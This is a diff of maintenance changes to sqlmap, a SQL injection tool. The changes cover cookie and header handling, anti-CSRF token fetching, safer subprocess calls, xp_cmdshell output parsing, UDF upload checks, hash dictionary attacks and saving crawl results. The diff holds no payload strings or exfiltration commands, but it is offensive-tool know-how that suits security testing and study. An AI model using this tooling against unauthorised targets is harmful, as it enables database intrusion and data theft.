_ = headers
|
||||
headers = {}
|
||||
headers = OrderedDict()
|
||||
for key, value in _.items():
|
||||
success = False
|
||||
if key.upper() not in (_.upper() for _ in getPublicTypeMembers(HTTP_HEADER, True)):
|
||||
|
@ -94,7 +95,7 @@ def forgeHeaders(items=None):
|
|||
kb.mergeCookies = not _ or _[0] in ("y", "Y")
|
||||
|
||||
if kb.mergeCookies:
|
||||
_ = lambda x: re.sub("(?i)%s=[^%s]+" % (cookie.name, conf.cookieDel or DEFAULT_COOKIE_DELIMITER), "%s=%s" % (cookie.name, getUnicode(cookie.value)), x)
|
||||
_ = lambda x: re.sub(r"(?i)\b%s=[^%s]+" % (re.escape(cookie.name), conf.cookieDel or DEFAULT_COOKIE_DELIMITER), "%s=%s" % (cookie.name, getUnicode(cookie.value)), x)
|
||||
headers[HTTP_HEADER.COOKIE] = _(headers[HTTP_HEADER.COOKIE])
|
||||
|
||||
if PLACE.COOKIE in conf.parameters:
|
||||
|
@ -105,7 +106,7 @@ def forgeHeaders(items=None):
|
|||
elif not kb.testMode:
|
||||
headers[HTTP_HEADER.COOKIE] += "%s %s=%s" % (conf.cookieDel or DEFAULT_COOKIE_DELIMITER, cookie.name, getUnicode(cookie.value))
|
||||
|
||||
if kb.testMode:
|
||||
if kb.testMode and not conf.csrfToken:
|
||||
resetCookieJar(conf.cj)
|
||||
|
||||
return headers
|
||||
|
@ -267,33 +268,37 @@ def decodePage(page, contentEncoding, contentType):
|
|||
|
||||
# can't do for all responses because we need to support binary files too
|
||||
if contentType and not isinstance(page, unicode) and "text/" in contentType.lower():
|
||||
# e.g. Ãëàâà
|
||||
if "&#" in page:
|
||||
page = re.sub(r"&#(\d{1,3});", lambda _: chr(int(_.group(1))) if int(_.group(1)) < 256 else _.group(0), page)
|
||||
if kb.heuristicMode:
|
||||
kb.pageEncoding = kb.pageEncoding or checkCharEncoding(getHeuristicCharEncoding(page))
|
||||
page = getUnicode(page, kb.pageEncoding)
|
||||
else:
|
||||
# e.g. Ãëàâà
|
||||
if "&#" in page:
|
||||
page = re.sub(r"&#(\d{1,3});", lambda _: chr(int(_.group(1))) if int(_.group(1)) < 256 else _.group(0), page)
|
||||
|
||||
# e.g. %20%28%29
|
||||
if "%" in page:
|
||||
page = re.sub(r"%([0-9a-fA-F]{2})", lambda _: _.group(1).decode("hex"), page)
|
||||
# e.g. %20%28%29
|
||||
if "%" in page:
|
||||
page = re.sub(r"%([0-9a-fA-F]{2})", lambda _: _.group(1).decode("hex"), page)
|
||||
|
||||
# e.g. &
|
||||
page = re.sub(r"&([^;]+);", lambda _: chr(htmlEntities[_.group(1)]) if htmlEntities.get(_.group(1), 256) < 256 else _.group(0), page)
|
||||
# e.g. &
|
||||
page = re.sub(r"&([^;]+);", lambda _: chr(htmlEntities[_.group(1)]) if htmlEntities.get(_.group(1), 256) < 256 else _.group(0), page)
|
||||
|
||||
kb.pageEncoding = kb.pageEncoding or checkCharEncoding(getHeuristicCharEncoding(page))
|
||||
page = getUnicode(page, kb.pageEncoding)
|
||||
kb.pageEncoding = kb.pageEncoding or checkCharEncoding(getHeuristicCharEncoding(page))
|
||||
page = getUnicode(page, kb.pageEncoding)
|
||||
|
||||
# e.g. ’…™
|
||||
if "&#" in page:
|
||||
def _(match):
|
||||
retVal = match.group(0)
|
||||
try:
|
||||
retVal = unichr(int(match.group(1)))
|
||||
except ValueError:
|
||||
pass
|
||||
return retVal
|
||||
page = re.sub(r"&#(\d+);", _, page)
|
||||
# e.g. ’…™
|
||||
if "&#" in page:
|
||||
def _(match):
|
||||
retVal = match.group(0)
|
||||
try:
|
||||
retVal = unichr(int(match.group(1)))
|
||||
except ValueError:
|
||||
pass
|
||||
return retVal
|
||||
page = re.sub(r"&#(\d+);", _, page)
|
||||
|
||||
# e.g. ζ
|
||||
page = re.sub(r"&([^;]+);", lambda _: unichr(htmlEntities[_.group(1)]) if htmlEntities.get(_.group(1), 0) > 255 else _.group(0), page)
|
||||
# e.g. ζ
|
||||
page = re.sub(r"&([^;]+);", lambda _: unichr(htmlEntities[_.group(1)]) if htmlEntities.get(_.group(1), 0) > 255 else _.group(0), page)
|
||||
|
||||
return page
|
||||
|
||||
|
|
|
@ -132,8 +132,15 @@ def _comparison(page, headers, code, getRatioValue, pageLength):
|
|||
seq1 = seq1[count:]
|
||||
seq2 = seq2[count:]
|
||||
|
||||
seqMatcher.set_seq1(seq1)
|
||||
seqMatcher.set_seq2(seq2)
|
||||
while True:
|
||||
try:
|
||||
seqMatcher.set_seq1(seq1)
|
||||
seqMatcher.set_seq2(seq2)
|
||||
except MemoryError:
|
||||
seq1 = seq1[:len(seq1) / 4]
|
||||
seq2 = seq2[:len(seq2) / 4]
|
||||
else:
|
||||
break
|
||||
|
||||
ratio = round(seqMatcher.quick_ratio(), 3)
|
||||
|
||||
|
|
|
@ -62,7 +62,9 @@ from lib.core.enums import REDIRECTION
|
|||
from lib.core.enums import WEB_API
|
||||
from lib.core.exception import SqlmapCompressionException
|
||||
from lib.core.exception import SqlmapConnectionException
|
||||
from lib.core.exception import SqlmapGenericException
|
||||
from lib.core.exception import SqlmapSyntaxException
|
||||
from lib.core.exception import SqlmapTokenException
|
||||
from lib.core.exception import SqlmapValueException
|
||||
from lib.core.settings import ASTERISK_MARKER
|
||||
from lib.core.settings import CUSTOM_INJECTION_MARK_CHAR
|
||||
|
@ -92,8 +94,9 @@ from lib.request.basic import processResponse
|
|||
from lib.request.direct import direct
|
||||
from lib.request.comparison import comparison
|
||||
from lib.request.methodrequest import MethodRequest
|
||||
from thirdparty.socks.socks import ProxyError
|
||||
from thirdparty.multipart import multipartpost
|
||||
from thirdparty.odict.odict import OrderedDict
|
||||
from thirdparty.socks.socks import ProxyError
|
||||
|
||||
|
||||
class Connect(object):
|
||||
|
@ -271,7 +274,6 @@ class Connect(object):
|
|||
url, params = url.split('?', 1)
|
||||
params = urlencode(params)
|
||||
url = "%s?%s" % (url, params)
|
||||
requestMsg += "?%s" % params
|
||||
|
||||
elif multipart:
|
||||
# Needed in this form because of potential circle dependency
|
||||
|
@ -305,7 +307,7 @@ class Connect(object):
|
|||
url = "%s?%s" % (url, get)
|
||||
requestMsg += "?%s" % get
|
||||
|
||||
if PLACE.POST in conf.parameters and not post and method in (None, HTTPMETHOD.POST):
|
||||
if PLACE.POST in conf.parameters and not post and method != HTTPMETHOD.GET:
|
||||
post = conf.parameters[PLACE.POST]
|
||||
|
||||
elif get:
|
||||
|
@ -353,6 +355,7 @@ class Connect(object):
|
|||
post = unicodeencode(post, kb.pageEncoding)
|
||||
|
||||
if method:
|
||||
method = unicodeencode(method)
|
||||
req = MethodRequest(url, post, headers)
|
||||
req.set_method(method)
|
||||
else:
|
||||
|
@ -385,7 +388,7 @@ class Connect(object):
|
|||
|
||||
conn = urllib2.urlopen(req)
|
||||
|
||||
if not kb.authHeader and getRequestHeader(req, HTTP_HEADER.AUTHORIZATION) and conf.authType.lower() == AUTH_TYPE.BASIC.lower():
|
||||
if not kb.authHeader and getRequestHeader(req, HTTP_HEADER.AUTHORIZATION) and (conf.authType or "").lower() == AUTH_TYPE.BASIC.lower():
|
||||
kb.authHeader = getRequestHeader(req, HTTP_HEADER.AUTHORIZATION)
|
||||
|
||||
if not kb.proxyAuthHeader and getRequestHeader(req, HTTP_HEADER.PROXY_AUTHORIZATION):
|
||||
|
@ -632,13 +635,14 @@ class Connect(object):
|
|||
auxHeaders = {}
|
||||
|
||||
raise404 = place != PLACE.URI if raise404 is None else raise404
|
||||
method = method or conf.method
|
||||
|
||||
value = agent.adjustLateValues(value)
|
||||
payload = agent.extractPayload(value)
|
||||
threadData = getCurrentThreadData()
|
||||
|
||||
if conf.httpHeaders:
|
||||
headers = dict(conf.httpHeaders)
|
||||
headers = OrderedDict(conf.httpHeaders)
|
||||
contentType = max(headers[_] if _.upper() == HTTP_HEADER.CONTENT_TYPE.upper() else None for _ in headers.keys())
|
||||
|
||||
if (kb.postHint or conf.skipUrlEncode) and kb.postUrlEncode:
|
||||
|
@ -650,7 +654,13 @@ class Connect(object):
|
|||
if payload:
|
||||
if kb.tamperFunctions:
|
||||
for function in kb.tamperFunctions:
|
||||
payload = function(payload=payload, headers=auxHeaders)
|
||||
try:
|
||||
payload = function(payload=payload, headers=auxHeaders)
|
||||
except Exception, ex:
|
||||
errMsg = "error occurred while running tamper "
|
||||
errMsg += "function '%s' ('%s')" % (function.func_name, ex)
|
||||
raise SqlmapGenericException(errMsg)
|
||||
|
||||
if not isinstance(payload, basestring):
|
||||
errMsg = "tamper function '%s' returns " % function.func_name
|
||||
errMsg += "invalid payload type ('%s')" % type(payload)
|
||||
|
@ -747,13 +757,63 @@ class Connect(object):
|
|||
if value and place == PLACE.CUSTOM_HEADER:
|
||||
auxHeaders[value.split(',')[0]] = value.split(',', 1)[1]
|
||||
|
||||
if conf.csrfToken:
|
||||
def _adjustParameter(paramString, parameter, newValue):
|
||||
retVal = paramString
|
||||
match = re.search("%s=(?P<value>[^&]*)" % re.escape(parameter), paramString)
|
||||
if match:
|
||||
origValue = match.group("value")
|
||||
retVal = re.sub("%s=[^&]*" % re.escape(parameter), "%s=%s" % (parameter, newValue), paramString)
|
||||
return retVal
|
||||
|
||||
page, headers, code = Connect.getPage(url=conf.csrfUrl or conf.url, data=conf.data if conf.csrfUrl == conf.url else None, method=conf.method if conf.csrfUrl == conf.url else None, cookie=conf.parameters.get(PLACE.COOKIE), direct=True, silent=True, ua=conf.parameters.get(PLACE.USER_AGENT), referer=conf.parameters.get(PLACE.REFERER), host=conf.parameters.get(PLACE.HOST))
|
||||
match = re.search(r"<input[^>]+name=[\"']?%s[\"']?\s[^>]*value=(\"([^\"]+)|'([^']+)|([^ >]+))" % re.escape(conf.csrfToken), page or "")
|
||||
token = (match.group(2) or match.group(3) or match.group(4)) if match else None
|
||||
|
||||
if not token:
|
||||
if conf.csrfUrl != conf.url and code == httplib.OK:
|
||||
if headers and "text/plain" in headers.get(HTTP_HEADER.CONTENT_TYPE, ""):
|
||||
token = page
|
||||
|
||||
if not token and any(_.name == conf.csrfToken for _ in conf.cj):
|
||||
for _ in conf.cj:
|
||||
if _.name == conf.csrfToken:
|
||||
token = _.value
|
||||
if not any (conf.csrfToken in _ for _ in (conf.paramDict.get(PLACE.GET, {}), conf.paramDict.get(PLACE.POST, {}))):
|
||||
if post:
|
||||
post = "%s%s%s=%s" % (post, conf.paramDel or DEFAULT_GET_POST_DELIMITER, conf.csrfToken, token)
|
||||
elif get:
|
||||
get = "%s%s%s=%s" % (get, conf.paramDel or DEFAULT_GET_POST_DELIMITER, conf.csrfToken, token)
|
||||
else:
|
||||
get = "%s=%s" % (conf.csrfToken, token)
|
||||
break
|
||||
|
||||
if not token:
|
||||
errMsg = "anti-CSRF token '%s' can't be found at '%s'" % (conf.csrfToken, conf.csrfUrl or conf.url)
|
||||
if not conf.csrfUrl:
|
||||
errMsg += ". You can try to rerun by providing "
|
||||
errMsg += "a valid value for option '--csrf-url'"
|
||||
raise SqlmapTokenException, errMsg
|
||||
|
||||
if token:
|
||||
for place in (PLACE.GET, PLACE.POST):
|
||||
if place in conf.parameters:
|
||||
if place == PLACE.GET and get:
|
||||
get = _adjustParameter(get, conf.csrfToken, token)
|
||||
elif place == PLACE.POST and post:
|
||||
post = _adjustParameter(post, conf.csrfToken, token)
|
||||
|
||||
for i in xrange(len(conf.httpHeaders)):
|
||||
if conf.httpHeaders[i][0].lower() == conf.csrfToken.lower():
|
||||
conf.httpHeaders[i] = (conf.httpHeaders[i][0], token)
|
||||
|
||||
if conf.rParam:
|
||||
def _randomizeParameter(paramString, randomParameter):
|
||||
retVal = paramString
|
||||
match = re.search("%s=(?P<value>[^&;]+)" % randomParameter, paramString)
|
||||
match = re.search("%s=(?P<value>[^&;]+)" % re.escape(randomParameter), paramString)
|
||||
if match:
|
||||
origValue = match.group("value")
|
||||
retVal = re.sub("%s=[^&;]+" % randomParameter, "%s=%s" % (randomParameter, randomizeParameterValue(origValue)), paramString)
|
||||
retVal = re.sub("%s=[^&;]+" % re.escape(randomParameter), "%s=%s" % (randomParameter, randomizeParameterValue(origValue)), paramString)
|
||||
return retVal
|
||||
|
||||
for randomParameter in conf.rParam:
|
||||
|
@ -768,7 +828,7 @@ class Connect(object):
|
|||
|
||||
if conf.evalCode:
|
||||
delimiter = conf.paramDel or DEFAULT_GET_POST_DELIMITER
|
||||
variables = {}
|
||||
variables = {"uri": uri}
|
||||
originals = {}
|
||||
|
||||
for item in filter(None, (get, post if not kb.postHint else None)):
|
||||
|
@ -787,6 +847,7 @@ class Connect(object):
|
|||
|
||||
originals.update(variables)
|
||||
evaluateCode(conf.evalCode, variables)
|
||||
uri = variables["uri"]
|
||||
|
||||
for name, value in variables.items():
|
||||
if name != "__builtins__" and originals.get(name, "") != value:
|
||||
|
@ -794,7 +855,7 @@ class Connect(object):
|
|||
found = False
|
||||
value = unicode(value)
|
||||
|
||||
regex = r"((\A|%s)%s=).+?(%s|\Z)" % (re.escape(delimiter), name, re.escape(delimiter))
|
||||
regex = r"((\A|%s)%s=).+?(%s|\Z)" % (re.escape(delimiter), re.escape(name), re.escape(delimiter))
|
||||
if re.search(regex, (get or "")):
|
||||
found = True
|
||||
get = re.sub(regex, "\g<1>%s\g<3>" % value, get)
|
||||
|
@ -883,7 +944,7 @@ class Connect(object):
|
|||
elif kb.nullConnection == NULLCONNECTION.RANGE:
|
||||
auxHeaders[HTTP_HEADER.RANGE] = "bytes=-1"
|
||||
|
||||
_, headers, code = Connect.getPage(url=uri, get=get, post=post, cookie=cookie, ua=ua, referer=referer, host=host, silent=silent, method=method, auxHeaders=auxHeaders, raise404=raise404, skipRead=(kb.nullConnection == NULLCONNECTION.SKIP_READ))
|
||||
_, headers, code = Connect.getPage(url=uri, get=get, post=post, method=method, cookie=cookie, ua=ua, referer=referer, host=host, silent=silent, auxHeaders=auxHeaders, raise404=raise404, skipRead=(kb.nullConnection == NULLCONNECTION.SKIP_READ))
|
||||
|
||||
if headers:
|
||||
if kb.nullConnection in (NULLCONNECTION.HEAD, NULLCONNECTION.SKIP_READ) and HTTP_HEADER.CONTENT_LENGTH in headers:
|
||||
|
@ -895,7 +956,7 @@ class Connect(object):
|
|||
|
||||
if not pageLength:
|
||||
try:
|
||||
page, headers, code = Connect.getPage(url=uri, get=get, post=post, cookie=cookie, ua=ua, referer=referer, host=host, silent=silent, method=method, auxHeaders=auxHeaders, response=response, raise404=raise404, ignoreTimeout=timeBasedCompare)
|
||||
page, headers, code = Connect.getPage(url=uri, get=get, post=post, method=method, cookie=cookie, ua=ua, referer=referer, host=host, silent=silent, auxHeaders=auxHeaders, response=response, raise404=raise404, ignoreTimeout=timeBasedCompare)
|
||||
except MemoryError:
|
||||
page, headers, code = None, None, None
|
||||
warnMsg = "site returned insanely large response"
|
||||
|
|
|
@@ -19,7 +19,7 @@ try:
except ImportError:
pass

_protocols = [ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv23]
_protocols = filter(None, (getattr(ssl, _, None) for _ in ("PROTOCOL_SSLv3", "PROTOCOL_TLSv1", "PROTOCOL_SSLv23", "PROTOCOL_SSLv2")))

class HTTPSConnection(httplib.HTTPSConnection):
"""

@ -38,6 +38,7 @@ from lib.core.enums import CHARSET_TYPE
|
|||
from lib.core.enums import DBMS
|
||||
from lib.core.enums import EXPECTED
|
||||
from lib.core.enums import PAYLOAD
|
||||
from lib.core.exception import SqlmapConnectionException
|
||||
from lib.core.exception import SqlmapNotVulnerableException
|
||||
from lib.core.exception import SqlmapUserQuitException
|
||||
from lib.core.settings import MAX_TECHNIQUES_PER_VALUE
|
||||
|
@ -371,11 +372,18 @@ def getValue(expression, blind=True, union=True, error=True, time=True, fromUser
|
|||
if union and isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION):
|
||||
kb.technique = PAYLOAD.TECHNIQUE.UNION
|
||||
kb.forcePartialUnion = kb.injection.data[PAYLOAD.TECHNIQUE.UNION].vector[8]
|
||||
value = _goUnion(forgeCaseExpression if expected == EXPECTED.BOOL else query, unpack, dump)
|
||||
fallback = not expected and kb.injection.data[PAYLOAD.TECHNIQUE.UNION].where == PAYLOAD.WHERE.ORIGINAL and not kb.forcePartialUnion
|
||||
|
||||
try:
|
||||
value = _goUnion(forgeCaseExpression if expected == EXPECTED.BOOL else query, unpack, dump)
|
||||
except SqlmapConnectionException:
|
||||
if not fallback:
|
||||
raise
|
||||
|
||||
count += 1
|
||||
found = (value is not None) or (value is None and expectingNone) or count >= MAX_TECHNIQUES_PER_VALUE
|
||||
|
||||
if not found and not expected and kb.injection.data[PAYLOAD.TECHNIQUE.UNION].where == PAYLOAD.WHERE.ORIGINAL and not kb.forcePartialUnion:
|
||||
if not found and fallback:
|
||||
warnMsg = "something went wrong with full UNION "
|
||||
warnMsg += "technique (could be because of "
|
||||
warnMsg += "limitation on retrieved number of entries)"
|
||||
|
|
|
@ -8,6 +8,7 @@ See the file 'doc/COPYING' for copying permission
|
|||
import os
|
||||
|
||||
from lib.core.agent import agent
|
||||
from lib.core.common import checkFile
|
||||
from lib.core.common import dataToStdout
|
||||
from lib.core.common import Backend
|
||||
from lib.core.common import isStackingAvailable
|
||||
|
@ -146,6 +147,7 @@ class UDF:
|
|||
|
||||
if len(self.udfToCreate) > 0:
|
||||
self.udfSetRemotePath()
|
||||
checkFile(self.udfLocalFile)
|
||||
written = self.writeFile(self.udfLocalFile, self.udfRemoteFile, "binary", forceCheck=True)
|
||||
|
||||
if written is not True:
|
||||
|
|
|
@ -7,6 +7,7 @@ See the file 'doc/COPYING' for copying permission
|
|||
|
||||
from lib.core.agent import agent
|
||||
from lib.core.common import Backend
|
||||
from lib.core.common import flattenValue
|
||||
from lib.core.common import getLimitRange
|
||||
from lib.core.common import getSQLSnippet
|
||||
from lib.core.common import hashDBWrite
|
||||
|
@ -226,12 +227,16 @@ class Xp_cmdshell:
|
|||
inject.goStacked("DELETE FROM %s" % self.cmdTblName)
|
||||
|
||||
if output and isListLike(output) and len(output) > 1:
|
||||
if not (output[0] or "").strip():
|
||||
output = output[1:]
|
||||
elif not (output[-1] or "").strip():
|
||||
output = output[:-1]
|
||||
_ = ""
|
||||
lines = [line for line in flattenValue(output) if line is not None]
|
||||
|
||||
output = "\n".join(line for line in filter(None, output))
|
||||
for i in xrange(len(lines)):
|
||||
line = lines[i] or ""
|
||||
if line is None or i in (0, len(lines) - 1) and not line.strip():
|
||||
continue
|
||||
_ += "%s\n" % line
|
||||
|
||||
output = _.rstrip('\n')
|
||||
|
||||
return output
|
||||
|
||||
|
|
|
@ -116,7 +116,7 @@ def tableExists(tableFile, regex=None):
|
|||
|
||||
if conf.verbose in (1, 2) and not hasattr(conf, "api"):
|
||||
clearConsoleLine(True)
|
||||
infoMsg = "[%s] [INFO] retrieved: %s\r\n" % (time.strftime("%X"), unsafeSQLIdentificatorNaming(table))
|
||||
infoMsg = "[%s] [INFO] retrieved: %s\n" % (time.strftime("%X"), unsafeSQLIdentificatorNaming(table))
|
||||
dataToStdout(infoMsg, True)
|
||||
|
||||
if conf.verbose in (1, 2):
|
||||
|
@ -224,11 +224,11 @@ def columnExists(columnFile, regex=None):
|
|||
|
||||
if conf.verbose in (1, 2) and not hasattr(conf, "api"):
|
||||
clearConsoleLine(True)
|
||||
infoMsg = "[%s] [INFO] retrieved: %s\r\n" % (time.strftime("%X"), unsafeSQLIdentificatorNaming(column))
|
||||
infoMsg = "[%s] [INFO] retrieved: %s\n" % (time.strftime("%X"), unsafeSQLIdentificatorNaming(column))
|
||||
dataToStdout(infoMsg, True)
|
||||
|
||||
if conf.verbose in (1, 2):
|
||||
status = '%d/%d items (%d%%)' % (threadData.shared.count, threadData.shared.limit, round(100.0 * threadData.shared.count / threadData.shared.limit))
|
||||
status = "%d/%d items (%d%%)" % (threadData.shared.count, threadData.shared.limit, round(100.0 * threadData.shared.count / threadData.shared.limit))
|
||||
dataToStdout("\r[%s] [INFO] tried %s" % (time.strftime("%X"), status), True)
|
||||
|
||||
kb.locks.io.release()
|
||||
|
@ -257,9 +257,9 @@ def columnExists(columnFile, regex=None):
|
|||
result = inject.checkBooleanExpression("%s" % safeStringFormat("EXISTS(SELECT %s FROM %s WHERE ROUND(%s)=ROUND(%s))", (column, table, column, column)))
|
||||
|
||||
if result:
|
||||
columns[column] = 'numeric'
|
||||
columns[column] = "numeric"
|
||||
else:
|
||||
columns[column] = 'non-numeric'
|
||||
columns[column] = "non-numeric"
|
||||
|
||||
kb.data.cachedColumns[conf.db] = {conf.tbl: columns}
|
||||
|
||||
|
|
|
@ -98,7 +98,7 @@ def dnsUse(payload, expression):
|
|||
retVal = output
|
||||
|
||||
if kb.dnsTest is not None:
|
||||
dataToStdout("[%s] [INFO] %s: %s\r\n" % (time.strftime("%X"), "retrieved" if count > 0 else "resumed", safecharencode(output)))
|
||||
dataToStdout("[%s] [INFO] %s: %s\n" % (time.strftime("%X"), "retrieved" if count > 0 else "resumed", safecharencode(output)))
|
||||
|
||||
if count > 0:
|
||||
hashDBWrite(expression, output)
|
||||
|
|
|
@ -74,7 +74,7 @@ def _oneShotErrorUse(expression, field=None):
|
|||
try:
|
||||
while True:
|
||||
check = "%s(?P<result>.*?)%s" % (kb.chars.start, kb.chars.stop)
|
||||
trimcheck = "%s(?P<result>.*?)</" % (kb.chars.start)
|
||||
trimcheck = "%s(?P<result>[^<]*)" % (kb.chars.start)
|
||||
|
||||
if field:
|
||||
nulledCastedField = agent.nullAndCastField(field)
|
||||
|
@ -130,6 +130,10 @@ def _oneShotErrorUse(expression, field=None):
|
|||
warnMsg += safecharencode(trimmed)
|
||||
logger.warn(warnMsg)
|
||||
|
||||
if not kb.testMode:
|
||||
check = "(?P<result>.*?)%s" % kb.chars.stop[:2]
|
||||
output = extractRegexResult(check, trimmed, re.IGNORECASE)
|
||||
|
||||
if any(Backend.isDbms(dbms) for dbms in (DBMS.MYSQL, DBMS.MSSQL)):
|
||||
if offset == 1:
|
||||
retVal = output
|
||||
|
|
|
@@ -322,7 +322,7 @@ def unionUse(expression, unpack=True, dump=False):
if len(status) > width:
status = "%s..." % status[:width - 3]

dataToStdout("%s\r\n" % status, True)
dataToStdout("%s\n" % status, True)

runThreads(numThreads, unionThread)

@@ -164,8 +164,8 @@ class Task(object):
             shutil.rmtree(self.output_directory)

     def engine_start(self):
-        self.process = Popen("python sqlmap.py --pickled-options %s" % base64pickle(self.options),
-                             shell=True, stdin=PIPE, close_fds=False)
+        self.process = Popen(["python", "sqlmap.py", "--pickled-options", base64pickle(self.options)],
+                             shell=False, stdin=PIPE, close_fds=False)

     def engine_stop(self):
         if self.process:
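The engine_start() change above replaces a shell-interpolated command string with an argument list and shell=False, so the pickled options blob is handed to the child process verbatim instead of being re-parsed (and potentially mangled or abused) by a shell. A minimal standalone sketch of the same pattern; the options blob and the echoing command are made up for illustration:

from subprocess import PIPE, Popen

options_blob = "gAJ9cQAu"  # hypothetical stand-in for base64pickle(self.options)

# Argument-list form: no shell parses the command line, so whitespace or
# shell metacharacters inside options_blob cannot alter it.
process = Popen(["python", "-c", "import sys; print(sys.argv[1])", options_blob],
                shell=False, stdin=PIPE, close_fds=False)
process.wait()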
@@ -5,20 +5,26 @@ Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """

+import codecs
 import httplib
+import os
 import re
 import urlparse
+import tempfile
 import time

 from lib.core.common import clearConsoleLine
 from lib.core.common import dataToStdout
 from lib.core.common import findPageForms
+from lib.core.common import readInput
+from lib.core.common import safeCSValue
 from lib.core.common import singleTimeWarnMessage
 from lib.core.data import conf
 from lib.core.data import kb
 from lib.core.data import logger
 from lib.core.exception import SqlmapConnectionException
 from lib.core.settings import CRAWL_EXCLUDE_EXTENSIONS
+from lib.core.settings import UNICODE_ENCODING
 from lib.core.threads import getCurrentThreadData
 from lib.core.threads import runThreads
 from lib.request.connect import Connect as Request
@@ -115,9 +121,6 @@ def crawl(target):
             logger.info(infoMsg)

         for i in xrange(conf.crawlDepth):
-            if i > 0 and conf.threads == 1:
-                singleTimeWarnMessage("running in a single-thread mode. This could take a while")
-
             threadData.shared.count = 0
             threadData.shared.length = len(threadData.shared.unprocessed)
             numThreads = min(conf.threads, len(threadData.shared.unprocessed))

@@ -125,7 +128,7 @@ def crawl(target):
             if not conf.bulkFile:
                 logger.info("searching for links with depth %d" % (i + 1))

-            runThreads(numThreads, crawlThread)
+            runThreads(numThreads, crawlThread, threadChoice=(i>0))
             clearConsoleLine(True)

             if threadData.shared.deeper:
@@ -146,4 +149,33 @@ def crawl(target):
             logger.warn(warnMsg)
         else:
             for url in threadData.shared.value:
-                kb.targets.add((url, None, None, None))
+                kb.targets.add((url, None, None, None, None))
+
+            storeResultsToFile(kb.targets)
+
+def storeResultsToFile(results):
+    if not results:
+        return
+
+    if kb.storeCrawlingChoice is None:
+        message = "do you want to store crawling results to a temporary file "
+        message += "for eventual further processing with other tools [y/N] "
+        test = readInput(message, default="N")
+        kb.storeCrawlingChoice = test[0] in ("y", "Y")
+
+    if kb.storeCrawlingChoice:
+        handle, filename = tempfile.mkstemp(prefix="sqlmapcrawling-", suffix=".csv" if conf.forms else ".txt")
+        os.close(handle)
+
+        infoMsg = "writing crawling results to a temporary file '%s' " % filename
+        logger.info(infoMsg)
+
+        with codecs.open(filename, "w+b", UNICODE_ENCODING) as f:
+            if conf.forms:
+                f.write("URL,POST\n")
+
+            for url, _, data, _, _ in results:
+                if conf.forms:
+                    f.write("%s,%s\n" % (safeCSValue(url), safeCSValue(data or "")))
+                else:
+                    f.write("%s\n" % url)
@@ -46,10 +46,8 @@ class Google(object):
         try:
             conn = self.opener.open("http://www.google.com/ncr")
             conn.info() # retrieve session cookie
-        except urllib2.HTTPError, e:
-            e.info()
-        except urllib2.URLError:
-            errMsg = "unable to connect to Google"
+        except Exception, ex:
+            errMsg = "unable to connect to Google ('%s')" % ex
             raise SqlmapConnectionException(errMsg)

     def search(self, dork):
@@ -154,7 +152,7 @@ class Google(object):
             warnMsg += "to get error page information (%d)" % e.code
             logger.critical(warnMsg)
             return None
-        except (urllib2.URLError, socket.error, socket.timeout):
+        except:
             errMsg = "unable to connect to DuckDuckGo"
             raise SqlmapConnectionException(errMsg)
@@ -69,6 +69,7 @@ from lib.core.settings import NULL
 from lib.core.settings import UNICODE_ENCODING
 from lib.core.settings import ROTATING_CHARS
 from lib.core.wordlist import Wordlist
+from thirdparty.colorama.initialise import init as coloramainit
 from thirdparty.pydes.pyDes import des
 from thirdparty.pydes.pyDes import CBC
@@ -508,6 +509,9 @@ def hashRecognition(value):
     return retVal

 def _bruteProcessVariantA(attack_info, hash_regex, suffix, retVal, proc_id, proc_count, wordlists, custom_wordlist):
+    if IS_WIN:
+        coloramainit()
+
     count = 0
     rotator = 0
     hashes = set([item[0][1] for item in attack_info])

@@ -581,6 +585,9 @@ def _bruteProcessVariantA(attack_info, hash_regex, suffix, retVal, proc_id, proc
     proc_count.value -= 1

 def _bruteProcessVariantB(user, hash_, kwargs, hash_regex, suffix, retVal, found, proc_id, proc_count, wordlists, custom_wordlist):
+    if IS_WIN:
+        coloramainit()
+
     count = 0
     rotator = 0
@@ -665,7 +672,7 @@ def dictionaryAttack(attack_dict):
             if not hash_:
                 continue

-            hash_ = hash_.split()[0]
+            hash_ = hash_.split()[0] if hash_ and hash_.strip() else hash_
             regex = hashRecognition(hash_)

             if regex and regex not in hash_regexes:

@@ -682,7 +689,7 @@ def dictionaryAttack(attack_dict):
             if not hash_:
                 continue

-            hash_ = hash_.split()[0]
+            hash_ = hash_.split()[0] if hash_ and hash_.strip() else hash_

             if re.match(hash_regex, hash_):
                 item = None

@@ -750,6 +757,8 @@ def dictionaryAttack(attack_dict):
         else:
             logger.info("using default dictionary")

+        dictPaths = filter(None, dictPaths)
+
         for dictPath in dictPaths:
             checkFile(dictPath)
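Both dictionaryAttack() hunks above guard the hash_.split()[0] access, because calling split() on an empty or whitespace-only string returns an empty list, so the bare [0] indexing raised IndexError. A small standalone illustration of the guarded form:

def first_token(value):
    # Fall back to the original value when it is empty or whitespace-only,
    # mirroring the conditional added in the hunks above.
    return value.split()[0] if value and value.strip() else value

print(first_token("5f4dcc3b5aa765d61d8327deb882cf99 admin"))  # hash part only
print(repr(first_token("   ")))  # unguarded .split()[0] would raise IndexError here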
@@ -64,7 +64,7 @@ def pivotDumpTable(table, colList, count=None, blind=True):
     colList = filter(None, sorted(colList, key=lambda x: len(x) if x else MAX_INT))

     if conf.pivotColumn:
-        if any(re.search(r"(.+\.)?%s" % conf.pivotColumn, _, re.I) for _ in colList):
+        if any(re.search(r"(.+\.)?%s" % re.escape(conf.pivotColumn), _, re.I) for _ in colList):
             infoMsg = "using column '%s' as a pivot " % conf.pivotColumn
             infoMsg += "for retrieving row data"
             logger.info(infoMsg)
@@ -173,7 +173,7 @@ def whereQuery(query):
         prefix, suffix = query.split(" ORDER BY ") if " ORDER BY " in query else (query, "")

         if "%s)" % conf.tbl.upper() in prefix.upper():
-            prefix = re.sub(r"(?i)%s\)" % conf.tbl, "%s WHERE %s)" % (conf.tbl, conf.dumpWhere), prefix)
+            prefix = re.sub(r"(?i)%s\)" % re.escape(conf.tbl), "%s WHERE %s)" % (conf.tbl, conf.dumpWhere), prefix)
         elif re.search(r"(?i)\bWHERE\b", prefix):
             prefix += " AND %s" % conf.dumpWhere
         else:
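This hunk, the pivotDumpTable() one above it and the later Entries hunk all wrap a user-supplied identifier in re.escape() before interpolating it into a pattern, so characters such as '(' or '$' are matched literally instead of being treated as regex syntax. A quick standalone comparison, using a made-up column name with an unbalanced parenthesis:

import re

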